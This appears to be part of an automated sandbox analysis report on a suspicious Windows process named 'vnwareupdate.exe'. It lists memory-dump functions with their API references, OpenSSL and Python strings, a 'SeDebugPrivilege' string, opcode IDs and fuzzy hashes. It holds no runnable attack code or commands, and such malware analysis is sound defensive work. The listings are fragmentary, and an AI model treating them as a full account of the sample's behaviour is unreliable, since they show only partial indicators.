Download Yara Rule

APIs

_errno.MSVCR90 ref: 02DB065C
malloc.MSVCR90 ref: 02DB0670
_errno.MSVCR90 ref: 02DB067F

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$malloc
String ID:
API String ID: 1976470507-0
Opcode ID: e446ab9f8a7de694609af1e6ac62804e557579734d7702943e0d5857502c23c1
Instruction ID: 6d3ec956fd891bf581313b3f7103203364aca0ccfacabab46c8440f374eca131
Opcode Fuzzy Hash: e446ab9f8a7de694609af1e6ac62804e557579734d7702943e0d5857502c23c1
Instruction Fuzzy Hash: 0D1105B19512208FC3519F59E448A8ABBE9EF88B61B1284ABF405CB361C3B0D891CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02DB9A80, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

_errno.MSVCR90 ref: 02DB9A8C
malloc.MSVCR90 ref: 02DB9AA0
_errno.MSVCR90 ref: 02DB9AAF

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$malloc
String ID:
API String ID: 1976470507-0
Opcode ID: 215d5aa331a80a18dfc4a5073f8cdee4d9991e6c0176dad19dccbd26a8c0ccf3
Instruction ID: 5c2dfa2d781ad79a0c84fa9f38854c2b144fdbd3e9b11fa70540dfcc83b2536c
Opcode Fuzzy Hash: 215d5aa331a80a18dfc4a5073f8cdee4d9991e6c0176dad19dccbd26a8c0ccf3
Instruction Fuzzy Hash: CF0108B19652208FD3519F5DE848A8ABFE9EF48B60B12959BF409CB221C3B0C491CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02DB19F0, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

_errno.MSVCR90 ref: 02DB19FC
malloc.MSVCR90 ref: 02DB1A10
_errno.MSVCR90 ref: 02DB1A1F

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$malloc
String ID:
API String ID: 1976470507-0
Opcode ID: 215d5aa331a80a18dfc4a5073f8cdee4d9991e6c0176dad19dccbd26a8c0ccf3
Instruction ID: a1f02b7b738e8c5524377daef892328ea5033316260138a6439ec468b61ec0bb
Opcode Fuzzy Hash: 215d5aa331a80a18dfc4a5073f8cdee4d9991e6c0176dad19dccbd26a8c0ccf3
Instruction Fuzzy Hash: E10108B19652208FD3519F5DE448A8ABBE9EF48B61B1295ABF449CB221C3B0D491CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02DB05D0, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

_errno.MSVCR90 ref: 02DB05DC
malloc.MSVCR90 ref: 02DB05F0
_errno.MSVCR90 ref: 02DB05FF

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$malloc
String ID:
API String ID: 1976470507-0
Opcode ID: 215d5aa331a80a18dfc4a5073f8cdee4d9991e6c0176dad19dccbd26a8c0ccf3
Instruction ID: 04261647b87bce9758cc9abe397f9858ca22e0e7534500af2e66aaa98ce16242
Opcode Fuzzy Hash: 215d5aa331a80a18dfc4a5073f8cdee4d9991e6c0176dad19dccbd26a8c0ccf3
Instruction Fuzzy Hash: 10010CB19612308FD3519F5DE448A8ABBE9EF48B61B529597F445CB221C3B0C491CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02DB0800, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

malloc.MSVCR90 ref: 02DB080A
malloc.MSVCR90 ref: 02DB082F

Part of subcall function 02DB0370: longjmp.MSVCR90(00000000,00000001,out of dynamic memory in yyensure_buffer_stack()), ref: 02DB0380

Strings

out of dynamic memory in yy_create_buffer(), xrefs: 02DB0819
out of dynamic memory in yy_create_buffer(), xrefs: 02DB083F

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: malloc$longjmp
String ID: out of dynamic memory in yy_create_buffer()$out of dynamic memory in yy_create_buffer()
API String ID: 2248186240-2516649376
Opcode ID: 2622aed87b92bd83a785acfa34d2200988f2d8993e04571ebf175c8117e8e04c
Instruction ID: 92630ba9a54cfd124ea0ae15ca56f5a0d41c166dfa33db477b32f19bcc7f6429
Opcode Fuzzy Hash: 2622aed87b92bd83a785acfa34d2200988f2d8993e04571ebf175c8117e8e04c
Instruction Fuzzy Hash: 96F096B1A447019BD621EB55AC15E8BB7D89F84B50F008829F48A97300D274EC04CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 02DA1690, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

PyObject_Malloc.PYTHON27(?,02EB5188), ref: 02DA16A1
PyObject_Init.PYTHON27(00000000), ref: 02DA16AB
PyString_FromString.PYTHON27(?), ref: 02DA16BF
PyString_FromString.PYTHON27(?), ref: 02DA16CD

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: FromObject_StringString_$InitMalloc
String ID:
API String ID: 3199475769-0
Opcode ID: dd11cf6e4d8342ef976b0bc317db022c7b60901b1ecef226f658a1ef83931e50
Instruction ID: ab1869574254459bc58a474ad2a8d756505273dd317b4e3b9d99726fe645dafd
Opcode Fuzzy Hash: dd11cf6e4d8342ef976b0bc317db022c7b60901b1ecef226f658a1ef83931e50
Instruction Fuzzy Hash: FFF04F719807009FC3208F5AE84C417B7F4FF44756B549D5EE94A83200D730E565CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DA1695, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

PyObject_Malloc.PYTHON27(?,02EB5188), ref: 02DA16A1
PyObject_Init.PYTHON27(00000000), ref: 02DA16AB
PyString_FromString.PYTHON27(?), ref: 02DA16BF
PyString_FromString.PYTHON27(?), ref: 02DA16CD

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: FromObject_StringString_$InitMalloc
String ID:
API String ID: 3199475769-0
Opcode ID: 0167bfaf08b7548dad5412fc047ba076f5e08b63aaefb32c79c78a20ee479053
Instruction ID: ed9037e686169beae162873d18548b6c3920da0d2be33d1e323f1323dc2e1ea1
Opcode Fuzzy Hash: 0167bfaf08b7548dad5412fc047ba076f5e08b63aaefb32c79c78a20ee479053
Instruction Fuzzy Hash: C0F06D709807009FC3208F6AA84C417B7F4FF44756B589D6EE88A83300D730E564CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02E15490, Relevance: 5.4, APIs: 4, Instructions: 419COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7a50992c7e1d43b6f95381e9ca4b6db7e39d0cb82b3544fad0306e2d1058594
Instruction ID: 69f033a5c079ec49b67ce66e8e9a9ca9f4ba0429e361d715d182206995a735fb
Opcode Fuzzy Hash: c7a50992c7e1d43b6f95381e9ca4b6db7e39d0cb82b3544fad0306e2d1058594
Instruction Fuzzy Hash: CAD15AB5644200AFD714DE68CC84E7BB7EEEFC9704F449A2CF98587344E635E8058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 02DAD8FC, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DAD98C

Strings

,, xrefs: 02DAD9BF
, xrefs: 02DAD9D3

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: $,
API String ID: 885266447-71045815
Opcode ID: 2bf976d256bbc503bb67abd25adf3f6876ca59824500999ae783e444cd141f6d
Instruction ID: 06f0a93c6460760e6f92a505358d9a6b3e260c2797f00383795811b76b67fc7e
Opcode Fuzzy Hash: 2bf976d256bbc503bb67abd25adf3f6876ca59824500999ae783e444cd141f6d
Instruction Fuzzy Hash: 564108B0A097029FC314CF19D5A4A2AFBE1FF88700F148A5AE48987721E374DD55CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02E0FD50, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,?,00000000,?,02E10798,00000000,?,0000000B,00000000), ref: 02E0FD84

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02E0FDA8, 02E0FDC6, 02E0FDF2, 02E0FE26, 02E0FE36

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 626452242-79188018
Opcode ID: a1e14c45013d0aaad1168f69b2f0176c355033569e1f7c8b66a1bc372e2d77e1
Instruction ID: 8fb5cb9d821b42d9c815cef57a4842b194ba6f3caac029180f8dd21d77158dd5
Opcode Fuzzy Hash: a1e14c45013d0aaad1168f69b2f0176c355033569e1f7c8b66a1bc372e2d77e1
Instruction Fuzzy Hash: 3221F472BC43043AF6302AB57C86F573349DB80F6EF549426F70CEA6C2E6D2A4E545A4

Uniqueness

Uniqueness Score: -1.00%

Function 02DE99B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 02DE9770: GetStdHandle.KERNEL32(000000F4), ref: 02DE978C
Part of subcall function 02DE9770: GetFileType.KERNEL32(00000000), ref: 02DE9799
Part of subcall function 02DE9770: _vsnprintf.MSVCR90 ref: 02DE97B7
Part of subcall function 02DE9770: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02DE97DA

raise.MSVCR90 ref: 02DE99CB
_exit.MSVCR90 ref: 02DE99D5

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 02DE99BF

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleTypeWrite_exit_vsnprintfraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 1829284227-569889646
Opcode ID: 1ea3017c04dace37d93912c6271b235a6d82da7e1232ea382018c9453216951c
Instruction ID: e2c939ab760cac487aff882202cea8b6b714edc6eea10e2e1f5b2d45fc203f24
Opcode Fuzzy Hash: 1ea3017c04dace37d93912c6271b235a6d82da7e1232ea382018c9453216951c
Instruction Fuzzy Hash: D1F0E9775842103FE900A679EDA19BBB7E9DFDB710F11950DF4C953344C171DC048662

Uniqueness

Uniqueness Score: -1.00%

Function 02DA1D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON27(02AFA968,line %d: %s,?,?), ref: 02DA1D97

Strings

%s(%d): %s, xrefs: 02DA1D78
line %d: %s, xrefs: 02DA1D91

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format
String ID: %s(%d): %s$line %d: %s
API String ID: 376477240-3587166966
Opcode ID: bffe9109308004e4eba41d0cbf0fb45651794a35c8f9aabc3e38003c8fb2127f
Instruction ID: 97583fde9ca55d4374f9b9b2c5a54e12de3c1a81d0aa870804b91ff2071ae9ec
Opcode Fuzzy Hash: bffe9109308004e4eba41d0cbf0fb45651794a35c8f9aabc3e38003c8fb2127f
Instruction Fuzzy Hash: 3BF06CB4A88341EFD704CF16D548A1BBBE4BB88651F94DC6DF4A883300D371D895CB66

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vnwareupdate.exe PID: 6404 Parent PID: 2540 vnwareupdate.exeCOMMON

Executed Functions

Function 02C6A98A, Relevance: 4.5, APIs: 3, Instructions: 27COMMON

Download Yara Rule

APIs

_malloc_crt.MSVCR90(00000080), ref: 02C6A992
_encode_pointer.MSVCR90(00000000), ref: 02C6A99B
__RTC_Initialize.LIBCMT ref: 02C6A9B9

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize_encode_pointer_malloc_crt
String ID:
API String ID: 1243150863-0
Opcode ID: 0ae2886767f9060a8b27868e2e60a3be5472b39c80a2055310fdb2043338f03b
Instruction ID: b4225b71022fbb8cdb6b397be63a8a14563ad3ff7b8b6960acb9416600b3ff54
Opcode Fuzzy Hash: 0ae2886767f9060a8b27868e2e60a3be5472b39c80a2055310fdb2043338f03b
Instruction Fuzzy Hash: 62E09AB399C2618FE3607BB5B84C37A3ED5FF80325F21096AE0A4E5140DE304C418FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BB3A10, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00008000,00000000,02BB39AE), ref: 02BB3A19

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 5b782ba34400c0d7754c1be1905f04f6c6ebe322bc480b445ebcf015282ce64d
Instruction ID: 1508a86b9c62f5c3bf1caae58e02fa4e31f1e3287301116f28cc55acdcee8e37
Opcode Fuzzy Hash: 5b782ba34400c0d7754c1be1905f04f6c6ebe322bc480b445ebcf015282ce64d
Instruction Fuzzy Hash: 2BC04C76AD4B0156E7504A759C0BB0425506764B11F945B51F295D91D0E95850545504

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02C10380, Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 244encryptionCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02C103D2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 02C103F7
GetLastError.KERNEL32 ref: 02C1042B
CryptAcquireContextW.ADVAPI32(F0000000,00000000,00000000,?,F0000000), ref: 02C10460
CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000001), ref: 02C10499
GetLastError.KERNEL32 ref: 02C104CD
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02C104E2
CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 02C1057C
GetLastError.KERNEL32 ref: 02C105C2
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02C10633

Strings

Enumerate bug: using workaround, xrefs: 02C1060B
Container name %s, len=%d, index=%d, flags=%d, xrefs: 02C10590
Listing containers CSP=%s, type = %d, xrefs: 02C103A7
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02C10419, 02C10482, 02C104BB, 02C10514, 02C10540, 02C105EA, 02C1061F
Got max container len %d, xrefs: 02C104F1
%lu. %s, xrefs: 02C105B1

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$ContextErrorLast$ByteCharMultiParamProvReleaseWide$Acquire
String ID: %lu. %s$..\..\openssl-1.1.0e\engines\e_capi.c$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Got max container len %d$Listing containers CSP=%s, type = %d
API String ID: 2639310310-608761734
Opcode ID: dbd1e901110bbe4ea0ddb173f2354ccb57665a779c19078fb9be0003ec538455
Instruction ID: a365a5eba2ddd2d25c22a742d78db9e9a9b2b012215c0aa5599d3bcb0cd8bf08
Opcode Fuzzy Hash: dbd1e901110bbe4ea0ddb173f2354ccb57665a779c19078fb9be0003ec538455
Instruction Fuzzy Hash: 6371EAB0F40304ABEB20AF659C8AF6F7779EF81704F20491DF905E7281E77599908BA5

Uniqueness

Uniqueness Score: -1.00%

Function 02BB6250, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

SeDebugPrivilege, xrefs: 02BCE801

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID: SeDebugPrivilege
API String ID: 4292702814-2896544425
Opcode ID: 814de2b7b1965ecb48536ee676a93452eca6700cc27ae271beb966a9fae7079e
Instruction ID: 5de105ecd6c264ce5826df9285c197e969716596c609dd234d86d0fba6f6a8d8
Opcode Fuzzy Hash: 814de2b7b1965ecb48536ee676a93452eca6700cc27ae271beb966a9fae7079e
Instruction Fuzzy Hash: 4231ADB1A44300AFD314DF19C848B5BBBE4EF88704F548AADF5898B2A0E770D504CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C102A0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyKey.ADVAPI32(?), ref: 02C102BF
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02C102CB
CertFreeCertificateContext.CRYPT32(00000000), ref: 02C102D8

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02C102E3

Memory Dump Source

